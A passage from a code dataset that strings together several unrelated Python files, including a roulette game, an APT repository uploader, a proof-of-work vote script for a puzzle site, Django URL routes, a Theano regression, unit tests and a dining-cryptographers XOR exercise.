while betnum == (0,36):\n betnum = int(input(\"What number do you want to bet on? (0-36) \"))\n if betnum in range(0,36):\n #2. save this bet for later function\n return betnum\n else:\n #3. if number is not in range ask to bet again\n print(\"Bet again\")\n betnum = input(\"What number do you want to bet on? (0-36) \")\n \n \n \n \n#function2: get_amount_to_bet\n#purpose: asks the user for an amount to bet\n#preconditions: = Parameters \n#postconditions: returns integer\n#Call the function\ndef get_amount_to_bet(pot):\n #1. ask user for a bet amount\n bet=int(input(\"How much do you want to bet ? \"))\n while bet == (0,pot):\n bet=int(input(\"How much do you want to bet ? \"))\n if bet in range(0,pot):\n return bet\n #2. continue if bet is in range if it is not tell the user it isnt\n while bet not in range(0,pot):\n print(\"That is too much!\")\n #3. ask the user again for a bet in range\n bet=int(input(\"How much do you want to bet ? \"))\n return bet\n \n \n \n \n#function3: get_choice\n#purpose: offers the user a choice of two characters or N, with a label and returns the character they entered\n#preconditions: = 3 choices that the user can pick from some of the bets \n#postconditions: returns only the upper case letters \n#Call the function\ndef get_choice(firstchoice,secondchoice,c):\n #1. ask user to choose what they want\n inputstring= (\"Do you want to bet on \" + c) \n #2. all of the inputs should be returned as upper case with x.upper()\n choice = input(inputstring).upper()\n while choice != firstchoice and choice != secondchoice and choice != \"N\":\n print(\"Not a valid answer\")\n choice = input(inputstring).upper()\n #Return choice for later\n return(choice)\n \n \n\n\n#function4: get_randnum()\n#purpose: this function will call the random number generator to get a random number in the right range\n#preconditions: = Parameters \n#postconditions: returns an integer\n#Call the function\ndef get_randnum():\n #2. get the random input from there bets\n random=randrange(0,37)\n return random\n\n\n\n\n#function5: display_spin\n#purpose: This will display the number the ball lands on \n#preconditions: = Random number generated \n#postconditions: returns integer \n#Call the function\ndef display_spin (random):\n #1. Once the random number is generated display the display_spin\n print(\"Spinning ... .1. 2. 3. 4... And the number is \",random)\n \n \n\n\n#function6: get_and_report_winnings\n#purpose: this function will return the amount the player won \n#preconditions: = Parameters \n#postconditions: returns values, output, changes to parameter\n#Call the function\ndef get_and_report_winnings(bet,betnum,pot,random,firstchoice,secondchoice,thirdchoice,choice):\n tot=0\n if betnum == random:\n tot += bet *5\n #1. Tell the user the amount of winning they win\n print(\"You win 5 times your bet! You hit the number!\",tot)\n else:\n #2. if you did not win display no penalty\n print(\"You did not get the number no penalty \")\n \n if firstchoice != \"N\":\n #3.0 Display if it was even or odd\n #3.1 if even or odd add 2 x to your bet\n if (random % 2 == 0 and firstchoice == 'E') or (random % 2 == 1 and firstchoice == \"O\"):\n tot+= 2 * bet\n firstchoice= 2 * bet\n print(\"You win two times your bet on odd/even! \", firstchoice)\n else: \n #3.2 if else take bet amount away from your pot\n tot-= bet\n firstchoice = bet\n print(\"you lost your bet on odd or even.\",firstchoice)\n #4.0 Display if it was red/black \n if secondchoice != \"N\":\n if (random % 3 == 0 and secondchoice == 'R') or (random % 3 > 0 and secondchoice == \"B\"):\n #4.1 if red or black add 3 x your bet\n tot+= 3 * bet\n secondchoice = 3 * bet\n print(\"You won three times your bet on red/black!\",tot)\n else:\n #4.2 if else take bet amount away from your pot\n tot-= 2 * bet\n secondchoice= 2 * bet\n print(\"You lose 2 times your bet.\",secondchoice)\n #5.0 Display if it was high, low or no bet\n if thirdchoice != \"N\":\n #5.1 if number<=18 then low if number>18 then high\n if (random > 18 and thirdchoice == \"H\") or (random < 18 and thirdchoice == \"L\"):\n #5.2 if you win high or low add bet amount to pot\n tot+= bet\n thirdchoice= bet\n print(\"You win your bet\", thirdchoice)\n else: \n #5.3 if else subtract bet amount from pot\n tot-= bet\n thirdchoice= bet\n print(\"You lost your bet on high/low\", thirdchoice)\n return tot\n \n \n \n \n#function7: get_y_or_n ()\n#purpose: this function asks the user a question about playing again and returns either an uppercase y or an uppercase n\n#preconditions: = No Parameters \n#postconditions: returns has to be uppercase y or uppercase n\n#Call the function\ndef get_y_or_n():\n #1.Display \"Do you want to play again?\" \n play=input(\"Do you want to play again? (y/n) \").upper()\n #2. choices of (y/n)\n while play != 'N' and play!= 'Y':\n #3. display choice of y/n if not a answer\n print(\"Not a answer\")\n play=input(\"Do you want to play again? (y/n) \").upper()\n return play\n \n \n \n\n\n\n\n\n\n\n#1. Main function \"def main:()\"\ndef main ():\n print()\n #2. display introductory message Spin and win! Big Blue Roulette!!!\n print(\"Spin and Win!!! Big Blue Roulette!!!\")\n #2.1 Dispay how much money they have \"$100\"\n pot= 100\n end= \"Y\"\n #3. Tell user how much there pot is\n print(\"Your pot is \",\"$\",pot,sep=\"\")\n print() \n #3.1 initialize pot, play flag\n while pot>0 and end == \"Y\":\n #4. Ask the user what number they want to bet on\n betnum = get_a_number_to_bet_on()\n #5. Call get_amount_to_bet\n bet=get_amount_to_bet(pot)\n #6. Call get_choice to offer them even/odd/no bet\n firstchoice = get_choice(\"E\", \"O\",\"even/odd/no bet? (E/O/N) \")\n #7. Call get_choice to offer them red/black/no bet (R/B/N)\n secondchoice = get_choice(\"R\",\"B\", \"red/black/no bet? (R/B/N) \")\n #8. Call get_choice to offer them high/low/no bet\n thirdchoice = get_choice(\"H\",\"L\",\"high/low/no bet? (H/L/N \")\n #9. Call get_randnum() to get the random integer of there bets\n random = get_randnum()\n print()\n #10. Call display_spin to display the random number\n display_spin(random) \n print()\n #11. After all the bets display total amount of pot after all of wins\n # and losses have been calculated. You win $....(amount)\n #11.1 Report total winnings \n tot = get_and_report_winnings(bet,betnum,pot,random,firstchoice,secondchoice,thirdchoice,choice)\n pot = pot + tot\n print(\"Now you have $\",pot)\n print()\n #12.0 If pot is less then 0 game is over\n if pot < 0:\n end = get_y_or_n() \n else:\n #12.1 Call get_y_or_n ()\n end = get_y_or_n()\n #13.0 Display you left the game with $(amount) because you quit\n print(\"Thanks for playing! You left the game with $\", pot)\n print()\n \n#14. End with main \nmain()\n","sub_path":"project/RussianRoulette2.py","file_name":"RussianRoulette2.py","file_ext":"py","file_size_in_byte":8123,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"536425332","text":"import zlib\n\nfrom depot.apt import AptPackage, AptPackages\n\nclass Repository(object):\n def __init__(self, storage):\n self.storage = storage\n\n def create(self):\n raise NotImplementedError\n\n def add_package(self, path):\n raise NotImplementedError\n\n def remove_package(self, package_id):\n raise NotImplementedError\n\n\nclass AptRepository(Repository):\n def add_package(self, path, codename, component='main', arch=None):\n pkg = AptPackage(path)\n # Check that we have an arch if needed\n if pkg['architecture'] == 'any':\n if not arch:\n raise ValueError('Architechture required when adding packages for \"any\"')\n else:\n arch = pkg['architecture']\n\n # Stream up the actual package file\n self.storage.upload(pkg.pool_path, open(path, 'rb'))\n\n # Update the Packages file\n packages_path = 'dists/{0}/{1}/binary-{2}/Packages'.format(codename, component, arch)\n packages = AptPackages(self.storage.download(packages_path, skip_hash=True) or '')\n packages.add(pkg, self.storage.hashes(pkg.pool_path))\n packages_raw = str(packages)\n self.storage.upload(packages_path, packages_raw)\n self.storage.upload(packages_path+'.gz', zlib.compress(packages_raw))\n\n # Update\n","sub_path":"depot/repository.py","file_name":"repository.py","file_ext":"py","file_size_in_byte":1325,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"517932412","text":"import requests\nfrom bs4 import BeautifulSoup\nfrom datetime import date\nimport hashlib\n\ndef cul_md5(vote):\n today = date.today()\n orc_code = \"%d%.2d%.2dKIDJourney%d\" % (today.year , today.month , today.day , vote)\n number = 0\n while True :\n temp = orc_code + str(number)\n if hashlib.md5(temp.encode()).hexdigest()[:6] == '000000' :\n return str(number)\n else :\n number += 1\n\ndef post_vote(hash_string):\n url = \"http://www.qlcoder.com/train/handsomerank\"\n soup = BeautifulSoup(requests.get(url).text)\n token = soup.find('input' , {'type':'hidden'}).get('value')\n post_data = {\"_token\":token , \n 'name':'KIDJourney',\n 'checkcode' : hash_string}\n response = requests.get(url , data=post_data)\n print(response.text)\n\nif __name__ == \"__main__\" :\n for i in range(4,1006):\n post_vote(cul_md5(i))","sub_path":"qlcoder/7581(2).py","file_name":"7581(2).py","file_ext":"py","file_size_in_byte":902,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"409058876","text":"from django.urls import path\nfrom .views import *\n\nurlpatterns = [\n path('', index, name='index'),\n path('reserva/', reserva, name='reserva'),\n path(\"envio\", recuperar, name='envio'),\n path('registro/', registro, name='registro'),\n path('envio2/', envio2, name='envio2'),\n path('envio3/', envio3, name='envio3'),\n path('sesion/', sesion, name='sesion'),\n path('local/', local, name='local'),\n]","sub_path":"Tarea3TICS/grupo15prim/miapp/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":417,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"616086952","text":"import hlt\nfrom hlt import NORTH, EAST, SOUTH, WEST, STILL, Move, Square\nimport random\n\nmyID, game_map = hlt.get_init()\nstartdir = 0\n \n#init\nf = open(\"lastlog.log\", 'w')\ninits = []\nids = []\nmyStart = None\nfor s in game_map:\n if s.owner == myID:\n myStart = s\n if not s.owner in ids and s.owner != myID and s.owner != 0:\n ids.append(s.owner)\n inits.append(s)\nclosest = inits[0]\nfor n in inits[1:]:\n if game_map.get_distance(myStart, n) < game_map.get_distance(myStart, closest):\n closest = n\n\nvalues = {}\nfor s in game_map:\n if abs(s.x - myStart.x) > 4 or abs(s.y - myStart.y) > 4:\n continue\n values[s] = s.production*30 - s.strength\ntargets = values.keys()\ntarget = None\nfor s in targets:\n if target == None or values[s] > values[target]:\n target = s\nf.write(str(target) + '\\n')\nglobal done\ndone = False\nx = target.x\ny = target.y\nf.write(\"%d, %d\\n\" % (x, y))\nf.close()\n\ndef move(s):\n global framenum\n if s.strength < s.production * 5:\n return Move(s, STILL)\n\n for d, n in enumerate(game_map.neighbors(s)):\n if s.strength > n.strength and n.owner != myID:\n return Move(s, d)\n\n side = 0\n dist = None\n ns = game_map.neighbors(s)\n for d, n in enumerate(ns):\n ctr = 1\n strength = 0\n prod = 0\n enemy = False\n while n.owner == myID and ctr < 45:\n ctr += 1\n n = game_map.get_target(n, d)\n strength = n.strength\n prod = n.production\n enemy = n.owner != 0 and n.owner != myID\n if framenum < 100:\n ctr -= prod/3\n ctr += strength/50\n else:\n ctr -= prod/2\n ctr += strength/70 \n if enemy:\n ctr -= 2\n if dist == None or ctr < dist:\n dist = ctr\n side = d\n n = game_map.get_target(s, side)\n if n.owner != myID and n.strength > s.strength:\n return Move(s, STILL)\n return Move(s, side)\n\ndef move_early(s):\n global done\n if s.x == x and s.y == y:\n done = True\n if done:\n return move(s)\n go = 0\n t = None\n wait = 15\n for d, n in enumerate(game_map.neighbors(s)):\n if game_map.get_distance(target, n) < game_map.get_distance(target, s):\n if t != None and t.strength < n.strength:\n continue\n go = d\n t = n\n if n.owner == myID:\n wait = 5\n if t.strength < s.strength and t.owner != myID:\n return Move(s, go)\n if s.strength < s.production * wait:\n return Move(s, STILL)\n return Move(s, go)\n\n#execute\nhlt.send_init(\"DistanceBot_fighter\")\nglobal framenum\nframenum = 0\nwhile True:\n global framenum\n game_map.get_frame()\n framenum += 1\n if done:\n moves = [move(s) for s in game_map if s.owner == myID]\n else:\n moves = [move_early(s) for s in game_map if s.owner == myID] \n hlt.send_frame(moves)\n","sub_path":"MyBot.py","file_name":"MyBot.py","file_ext":"py","file_size_in_byte":2977,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"631427002","text":"#!/usr/bin/env python3\n\n\"\"\" Usage:\n\n python3 -m unittest -v test\n\"\"\"\n\nimport unittest\nfrom boolsheet import BoolSheet\nfrom exceptions import (\n BoolSheetSymbolError,\n BoolSheetOperandError,\n BoolSheetParenthesesError,\n BoolSheetVariableError)\n\n\nclass TestBoolSheet(unittest.TestCase):\n def test_to_lst_method(self):\n \"\"\" Test the method to_lst()\n \"\"\"\n\n # Allowed expression\n result = BoolSheet('~(A + B)C').to_lst()\n self.assertEqual(result, ['~', '(', 'A', '+', 'B', ')', 'C'])\n\n def test_check_symbols(self):\n \"\"\" Test the method _check_symbols()\n \"\"\"\n\n # Check for variables\n result = BoolSheet('~(+)')\n with self.assertRaises(BoolSheetVariableError):\n result._check_symbols()\n\n # Not allowed symbol '*'\n result = BoolSheet('~(A + B)*C')\n with self.assertRaises(BoolSheetSymbolError):\n result._check_symbols()\n\n def test_check_operands(self):\n \"\"\" Test the method _check_operands()\n \"\"\"\n\n # Not allowed operand '~+'\n result = BoolSheet('~(A ~+ B)C')\n with self.assertRaises(BoolSheetOperandError):\n result._check_operands()\n\n # Not allowed operand '~)'\n result = BoolSheet('~(A + B~)C')\n with self.assertRaises(BoolSheetOperandError):\n result._check_operands()\n\n # Not allowed operand '++'\n result = BoolSheet('~(A ++ B)C')\n with self.assertRaises(BoolSheetOperandError):\n result._check_operands()\n\n # Not allowed operand '(+'\n result = BoolSheet('~(+A + B)C')\n with self.assertRaises(BoolSheetOperandError):\n result._check_operands()\n\n # Not allowed start with '+'\n result = BoolSheet('+~(A + B)C')\n with self.assertRaises(BoolSheetOperandError):\n result._check_operands()\n\n # Not allowed end with '+'\n result = BoolSheet('~(A + B)C+')\n with self.assertRaises(BoolSheetOperandError):\n result._check_operands()\n\n # Not allowed end with '~'\n result = BoolSheet('~(A + B)C~')\n with self.assertRaises(BoolSheetOperandError):\n result._check_operands()\n\n def test_check_parentheses(self):\n \"\"\" Test the method _check_parentheses()\n \"\"\"\n\n # Check parentheses nest misused\n result = BoolSheet('~(A ~+ B))C')\n with self.assertRaises(BoolSheetParenthesesError):\n result._check_parentheses()\n\n # Check parentheses nest misused\n result = BoolSheet('~)(A ~+ B)C(')\n with self.assertRaises(BoolSheetParenthesesError):\n result._check_parentheses()\n\n def test_to_lst(self):\n \"\"\" Test the method to_lst()\n \"\"\"\n\n # Test string to list convertion\n result = BoolSheet('~(A + B)CA').to_lst()\n self.assertEqual(result, ['~', '(', 'A', '+', 'B', ')', 'C', 'A'])\n\n def test_nest_parentheses(self):\n \"\"\" Test the method nest_parentheses()\n \"\"\"\n\n # Test correct nested parentheses\n bs = BoolSheet('~(A + B)(CA)')\n result = bs.nest_parentheses(bs.expstr)[1]\n self.assertEqual(result, ['~', ['A', '+', 'B'], ['C', 'A']])\n\n def test_complement(self):\n \"\"\" Test the method complement()\n \"\"\"\n\n # Test complemented variables\n bs = BoolSheet('~(A + ~B) ~CA')\n result = bs.complement(bs.nest_parentheses(bs.to_lst())[1])\n self.assertEqual(\n result, [['~', ['A', '+', ['~', 'B']]], ['~', 'C'], 'A'])\n\n def test_to_graph(self):\n \"\"\" Test the method to_graph()\n \"\"\"\n\n # Correct nested expressions\n result = BoolSheet('~(A + B (AB + ~C)(CD)) D').to_graph()\n self.assertEqual(\n result, [['~', ['A', '+', 'B', ['A', 'B', '+', ['~', 'C']],\n ['C', 'D']]], 'D'])\n\n def test_pick_vars(self):\n \"\"\" Test the method pick_vars()\n \"\"\"\n\n # Pick boolean variables\n result = BoolSheet('~(A + B)CA').pick_vars()\n self.assertEqual(result, ['A', 'B', 'C'])\n\n def test_get_inner(self):\n \"\"\" Test the method get_inner()\n \"\"\"\n\n # Get the first innermost\n result = BoolSheet('~(A + B (AB + ~C)(CD)) D').get_inner()\n self.assertEqual(result, ['C', 'D'])\n\n\nif __name__ == '__main__':\n unittest.main()\n","sub_path":"test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":4415,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"447649626","text":"# modulo do django que cria urls\nfrom django.urls import path\n# importe todas suas classes do views.py\nfrom .views import *\n\nurlpatterns = [\n\n #path (caminho/da/url,ClasseDoView.as_view(),name=\"nomedessaurl\")\n\tpath('',PaginaInicialView.as_view(), name=\"index\"),\n path('sobre/', SobreView.as_view(), name=\"sobre\"),\n\tpath('curriculo/', CurriculoView.as_view(), name=\"curriculo\"),\n \tpath('relatorio/atual/', VendaRelatirioList.as_view(), name=\"relatorio\"),\n\n\tpath('formulario/', FormularioView.as_view(), name=\"formulario\"),\n\tpath('lista/estados/', EstadoList.as_view(), name=\"listar-estados\"),\n\tpath('lista/cidades/', CidadeList.as_view(), name=\"listar-cidades\"),\n\tpath('lista/paises/', PaisList.as_view(), name=\"listar-paises\"),\n\tpath('lista/clientes/', ClienteList.as_view(), name=\"listar-clientes\"),\n\tpath('lista/funcionarios/', FuncionarioList.as_view(), name=\"listar-funcionarios\"),\n\tpath('lista/fornecedores/', FornecedorList.as_view(), name=\"listar-fornecedores\"),\n\tpath('lista/produtos/', ProdutoList.as_view(), name=\"listar-produtos\"),\n\tpath('lista/vendas/', VendaList.as_view(), name=\"listar-vendas\"),\n\n \tpath('venda/', VendaDetalhes.as_view(),name=\"detalhes_vendas\"),\n\t# path('funcionario/', FuncionarioView.as_view(), name=\"funcionario\"),\n\t# path('cliente/', ClienteView.as_view(), name=\"cliente\"),\n\n\t# path('historico/', HistoricoView.as_view(), name=\"historico\"),\n\n\t\n #URLS de cadastros \n path('cadastrar/estado/',EstadoCreate.as_view(), name=\"cadastrar-estado\"),\n\tpath('editar/estado//',EstadoUpdate.as_view(), name=\"editar-estado\"),\n path('excluir/estado//',EstadoDelete.as_view(), name=\"excluir-estado\"),\n\n\t #URLS de cadastros de paises\n\n\tpath('cadastrar/pais/',PaisCreate.as_view(), name=\"cadastrar-pais\"),\n\tpath('editar/pais/',PaisUpdate.as_view(), name=\"editar-pais\"),\n\tpath('excluir/pais//',PaisDelete.as_view(), name=\"excluir-pais\"),\n\t\n\t #URLS de cadastros de cidades\n\n\tpath('cadastrar/cidade/',CidadeCreate.as_view(), name=\"cadastrar-cidade\"),\n\tpath('excluir/cidade/',CidadeDelete.as_view(), name=\"excluir-cidade\"),\n\tpath('editar/cidade/',CidadeUpdate.as_view(), name=\"editar-cidade\"),\n\n\t#URLS de cadastros de clientes\n\n\tpath('cadastrar/cliente/',ClienteCreate.as_view(), name=\"cadastrar-cliente\"),\n\tpath('editar/cliente/',ClienteUpdate.as_view(), name=\"editar-cliente\"),\n path('excluir/cliente/',ClienteDelete.as_view(), name=\"excluir-cliente\"),\n\t#URLS de cadastros de funcionario\n\n path('cadastrar/funcionario/',FuncionarioCreate.as_view(), name=\"cadastrar-funcionario\"),\n\tpath('editar/funcionario/',FuncionarioUpdate.as_view(), name=\"editar-funcionario\"),\n path('excluir/funcionario/',FuncionarioDelete.as_view(), name=\"excluir-funcionario\"),\n\n\t#URLS de cadastros de fornecedores\n\n\tpath('cadastrar/fornecedor/',FornecedorCreate.as_view(), name=\"cadastrar-fornecedor\"),\n\tpath('editar/fornecedor/',FornecedorUpdate.as_view(), name=\"editar-fornecedor\"),\n\tpath('excluir/fornecedor/',FornecedorDelete.as_view(), name=\"excluir-fornecedor\"),\n\n\t#URLS de cadastros de produto\n\tpath('cadastrar/produto/',ProdutoCreate.as_view(), name=\"cadastrar-produto\"),\n\tpath('editar/produto/',ProdutoUpdate.as_view(), name=\"editar-produto\"),\n\tpath('excluir/produto/',ProdutoDelete.as_view(), name=\"excluir-produto\"),\n\n\t#URLS de cadastros de venda\n\tpath('cadastrar/venda/',VendaCreate.as_view(), name=\"cadastrar-venda\"),\n\n\t#URLS de cadastros de entrada de produto\n\n\tpath('cadastrar/entradaProduto/', EntradaProdutoCreate.as_view(),\n\t name=\"cadastrar-entrada-produto\"),\n\n\n\n\n]\n","sub_path":"adocao/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":3651,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"546646129","text":"def saveusers(clients, filename):\n text = \"\"\n for user in clients:\n text += user + \",\" + str(clients[user]) # dette får jeg skrevet til tekst, men socket connection må konverteres her til str.\n #print(type(clients[user]), \" her\")\n f = open(filename,'w')\n f.write(text)\n f.close()\n\ndef loadusers(filename):\n db = {}\n f = open(\"users.txt\")\n users = f.readlines()\n f.close()\n\n# det skjer en feil her fordi user's connection er ikke av typen socket, men av typen string\n for user in users:\n db[user.split(\",\")[0]] = user.split(\",\")[1][:-1] # riktig = feil, der feil er connection på stringformat\n print(user.split(\",\")[1][:-1])\n return db\n\ndef savehistory(history, filename):\n text = \"\"\n for line in history:\n text += line + \"\\n\"\n\n f = open(filename, 'w')\n f.write(text)\n f.close()\n\ndef loadhistory(filename):\n list = []\n\n f = open(filename, 'r')\n history = f.readlines()\n for line in history:\n list.append(line)\n return list\n\ndef load(filnavn):\n f = open(filnavn,'r')\n\n info = f.readlines()\n list = []\n\n for line in info:\n list.append(line)\n f.close()\n\n return list\n\n","sub_path":"Server/file.py","file_name":"file.py","file_ext":"py","file_size_in_byte":1197,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"536125741","text":"#!/usr/bin/python\n\n#coding=gbk\n\n# Echo server program\nimport socket\n\nHOST = '' # Symbolic name meaning all available interfaces\nPORT = 8080 # Arbitrary non-privileged port\n\nwith socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:\n s.bind((HOST, PORT))\n s.listen(1)\n conn, addr = s.accept()\n with conn:\n print('Connected by', addr)\n while True:\n data = conn.recv(1024)\n if not data: break\n #conn.sendall(data)\n #print(len(data), data, '\\n')\n print('len=', len(data), '\\n')\n if len(data) == 22:\n conn.send(b'GATOR 20\\n')\n if len(data) == 411:\n conn.send(b'\\x04\\x00\\x00\\x00\\x00\\x00')\n if len(data) == 66:\n conn.send(b'\\x01\\xcd\\x03\\x00\\x00\\x00')\n conn.send(data_973)\n \n","sub_path":"socket/python-tcpsvr.py","file_name":"python-tcpsvr.py","file_ext":"py","file_size_in_byte":888,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"521110909","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Mon Feb 26 12:04:01 2018\n\n@author: Sotheanith Sok\n\"\"\"\n\nimport matplotlib.pyplot as plt \n\n\nx=range(3)\n\nplt.bar(x,[10,2,5])\n\nplt.show()","sub_path":"Project3/untitled0.py","file_name":"untitled0.py","file_ext":"py","file_size_in_byte":172,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"375371886","text":"from django.views.generic import View\nfrom django.shortcuts import render\n\nfrom quizzes.models import Quiz\nfrom quizzes.utils.nvd3 import create_chart_data_set\n\n\nclass QuizResultView(View):\n\n def get(self, request, *args, **kwargs):\n\n hash_id = self.kwargs.get('slug')\n quiz = Quiz.objects.public().get(hash_id=hash_id)\n\n questions = quiz.question_set.public()\n\n chart_data_set = create_chart_data_set(quiz)\n\n return render(\n request,\n \"quiz/result.html\",\n context={\n \"site_name\": \"typeYou\",\n \"quiz\": quiz,\n \"questions\": questions,\n \"chart_data_set\": chart_data_set,\n },\n )\n","sub_path":"typeYou/quizzes/views/quiz/result.py","file_name":"result.py","file_ext":"py","file_size_in_byte":723,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"402864007","text":"import theano\nimport theano.tensor as T\nfrom sklearn.datasets import make_regression\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.metrics import r2_score\nimport numpy as np\n\nx,y = make_regression(n_samples=1000, noise=1.0)\nx_train, x_test, y_train, y_test = train_test_split(x,y,test_size=0.4)\n\nX = T.fmatrix(\"X\") #floating point matrix\nY = T.fvector(\"Y\")\n\nw_init = np.zeros(x.shape[1])\nb_init = 0.0\nw= theano.shared(w_init)\nb= theano.shared(b_init)\n\np_y = T.dot(X,w) + b\ncost = T.mean((Y-p_y)**2)\nw_grad = T.grad(cost,w)\nb_grad = T.grad(cost,b)\n\ntrain_op = theano.function(inputs = [X,Y],\n outputs = cost,\n updates=[(w,w-0.01*w_grad),\n (b,b-0.01*b_grad)],\n allow_input_downcast=True)\npredict_ = theano.function(inputs = [X],\n outputs = p_y,\n allow_input_downcast=True)\n\nepoch=1000\nfor i in range(epoch):\n train_op(x_train,y_train)\n\nprint(r2_score(y_train, predict_(x_train)))\nprint(r2_score(y_test, predict_(x_test)))\n","sub_path":"linear_regre_theano.py","file_name":"linear_regre_theano.py","file_ext":"py","file_size_in_byte":1108,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"496756740","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\n# (C) Andrew Vasilyev, 2010\n\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License as published by\n# the Free Software Foundation; either version 2 of the License, or\n# (at your option) any later version.\n\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 675 Mass Ave, Cambridge, MA 02139, USA. \n\nimport sys\n\nfrom preprocessor import Preprocessor\n\ndef parse_args(args):\n i = 1\n source_filename, target_filename, include_filenames = \"\", \"\", []\n while i < len(args):\n if \"-s\" == args[i]:\n i = i + 1\n source_filename = args[i]\n elif \"-t\" == args[i]:\n i = i + 1\n target_filename = args[i]\n elif \"-i\" == args[i]:\n i = i + 1\n while i < len(args) and \"-\" != args[i][0]:\n include_filenames.append(args[i])\n i = i + 1\n i = i + 1\n return (source_filename, target_filename, include_filenames)\n\ndef main(args):\n print(\"Athene Preprocessor v. 0.1\")\n if (len(args) > 2): \n source_filename, target_filename, include_filenames = parse_args(args)\n if (\"\" == source_filename or \"\" == target_filename):\n print(\"arguments error\")\n preprocessor = Preprocessor(source_filename, target_filename, include_filenames)\n preprocessor.run()\n print(\"ok!\")\n else:\n print(\"Usage:\")\n print(\"\\tathp -s source -t target [-i file file file]\") \n \nif __name__ == '__main__':\n main(sys.argv)","sub_path":"trash/athene/src/athp/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1935,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"101323881","text":"import nltk\nimport re\n\nnltk.download('punkt')\nnltk.download('maxent_treebank_pos_tagger')\nnltk.download('averaged_perceptron_tagger')\n\nfrom nltk import word_tokenize, pos_tag\n\nclass Recommender:\n\t\"\"\"docstring for Recommender\"\"\"\n\tdef __init__(self, bio):\n\t\tself.bio = bio\n\n\tdef tag_words(self):\n\t\ttokenized_text = word_tokenize(self.bio)\n\t\ttagged_words = pos_tag(tokenized_text)\n\t\ttagged_words_filtered = []\n\t\t# Filter out words that aren't nouns, verbs and adverbs\n\t\tpattern1 = re.compile(\"V.*\")\n\t\tpattern2 = re.compile(\"N.*\")\n\t\tpattern3 = re.compile(\"R.*\")\n\t\tfor (word, tag) in tagged_words:\n\t\t\tif pattern1.match(tag) or pattern2.match(tag) or pattern3.match(tag):\n\t\t\t\ttagged_words_filtered.append(word.lower())\n\n\t\treturn tagged_words_filtered\n","sub_path":"app/recommender.py","file_name":"recommender.py","file_ext":"py","file_size_in_byte":745,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"29069863","text":"def hex_to_binary_string(hex):\n return bin(int(hex, 16))[2:].zfill(16)\n\ndef binary_string_to_hex(binary):\n return hex(int(binary, 2))[2:].zfill(4).upper()\n\ndef did_not_pay_for_meal(conf):\n return conf[\"SA\"]^conf[\"SB\"]\n\ndef did_pay_for_meal(conf):\n return 1 - did_not_pay_for_meal(conf)\n\ndef calculate_output(conf):\n SA = hex_to_binary_string(conf[\"SA\"])\n SB = hex_to_binary_string(conf[\"SB\"])\n DA = hex_to_binary_string(conf[\"DA\"])\n DB = hex_to_binary_string(conf[\"DB\"])\n M = hex_to_binary_string(conf[\"M\"])\n\n our_broadcast_binary = \"\"\n\n should_send_message = conf[\"b\"]\n\n for i in range(16):\n conf_i = {\n \"SA\": int(SA[i]),\n \"SB\": int(SB[i]),\n \"DA\": int(DA[i]),\n \"DB\": int(DB[i]),\n \"M\": int(M[i])\n }\n\n # Construct out broadcasted message\n XOR = conf_i[\"SA\"]^conf_i[\"SB\"]\n if should_send_message:\n our_broadcast_i = XOR^conf_i[\"M\"]\n else:\n our_broadcast_i = XOR\n\n our_broadcast_binary += str(our_broadcast_i)\n \n our_broadcast = binary_string_to_hex(our_broadcast_binary)\n # print(\"Our broadcast: {}\".format(our_broadcast))\n\n if not should_send_message:\n secret_message_binary = \"\"\n for i in range(16):\n conf_i = {\n \"WE\": int(our_broadcast_binary[i]),\n \"DA\": int(DA[i]),\n \"DB\": int(DB[i]),\n }\n\n XOR = conf_i[\"WE\"]^conf_i[\"DA\"]^conf_i[\"DB\"]\n secret_message_binary += str(XOR)\n secret_message = binary_string_to_hex(secret_message_binary)\n # print(\"Secret message: {}\".format(secret_message))\n return our_broadcast + secret_message\n else:\n return our_broadcast\n\n\n\nconf_1 = {\n \"SA\": \"0C73\",\n \"SB\": \"80C1\",\n \"DA\": \"A2A9\",\n \"DB\": \"92F5\",\n \"M\": \"9B57\",\n \"b\": 0\n}\nconf_2 = {\n \"SA\": \"27C2\",\n \"SB\": \"0879\",\n \"DA\": \"35F6\",\n \"DB\": \"1A4D\",\n \"M\": \"27BC\",\n \"b\": 1\n}\nconf_quiz = {\n \"SA\": \"DA12\",\n \"SB\": \"5050\",\n \"DA\": \"C826\",\n \"DB\": \"4264\",\n \"M\": \"ADE4\",\n \"b\": 1\n}\na = 